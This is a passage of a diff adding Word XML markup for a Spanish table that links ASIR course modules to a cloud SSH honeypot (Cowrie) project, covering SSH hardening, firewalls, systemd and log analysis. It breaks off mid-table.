+        <w:t xml:space="preserve">La Tabla 1 recoge los módulos del ciclo de ASIR que intervienen en el proyecto y, para cada uno, el trabajo concreto en el que se aplican sus contenidos. Se indica también el grado de relación, para distinguir los módulos en los que se apoya el núcleo del proyecto de aquellos con una aportación puntual.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2143"/>
+        <w:gridCol w:w="4604"/>
+        <w:gridCol w:w="1191"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Módulo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Aplicación en el proyecto</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Relación</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Seguridad y Alta Disponibilidad</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Bastionado del SSH (puerto 2022, solo clave, sin root), cortafuegos en dos capas (Cloud Firewall e iptables), confinamiento del servicio con systemd, honeypot como técnica de detección y análisis de ataques con MITRE ATT&amp;CK.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Principal</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Administración de Sistemas Operativos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Gestión de usuarios y permisos (usuario administrador y usuario sin privilegios para Cowrie), servicios con systemd, scripts de administración en Bash, actualizaciones automáticas y diagnóstico con journalctl.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Principal</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Servicios de Red e Internet</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Configuración del servicio SSH (sshd_config, activación por socket en Ubuntu 24.04), autenticación por clave y transferencia de ficheros con scp.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Principal</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Planificación y Administración de Redes</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Direccionamiento IP público, redirección de puertos con NAT (PREROUTING), filtrado de tráfico y verificación con nmap.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Principal</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Implantación de Sistemas Operativos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Despliegue de Ubuntu Server 24.04 en la nube, elección de imagen y arquitectura, entornos virtuales de Python y laboratorio en VirtualBox.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Alta</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Lenguajes de Marcas y Sistemas de Gestión de Información</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Procesamiento de los logs en formato JSON, exportación a CSV y diagramas del proyecto elaborados en HTML y SVG.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Media</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Fundamentos de Hardware</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Dimensionado del servidor (vCPU, memoria y disco) y diferencias entre arquitecturas x86 y ARM, que reaparecen en el malware capturado, compilado para cinco arquitecturas.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Media</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Implantación de Aplicaciones Web</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Consumo de la API REST de geolocalización y del servicio de notificaciones; publicación del proyecto en un repositorio Git.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Baja</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Gestión de Bases de Datos / Administración de SGBD</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Sin relación directa: los eventos se almacenan en ficheros JSON. La integración con el SIEM Wazuh, que indexa los eventos, se plantea como trabajo futuro.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Indirecta</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Inglés Profesional</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Documentación técnica en inglés (Cowrie, MITRE ATT&amp;CK, informes de amenazas de Kaspersky y SANS) y redacción del Abstract.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Media</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Digitalización Aplicada a los Sectores Productivos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Uso de servicios cloud, automatización del despliegue con scripts y del análisis con Python.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Media</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Sostenibilidad Aplicada al Sistema Productivo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2900"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Dimensionado ajustado a la carga real y eliminación del servidor al terminar la captura, sin recursos ociosos.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Baja</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1350"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Itinerario Personal para la Empleabilidad I y II</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
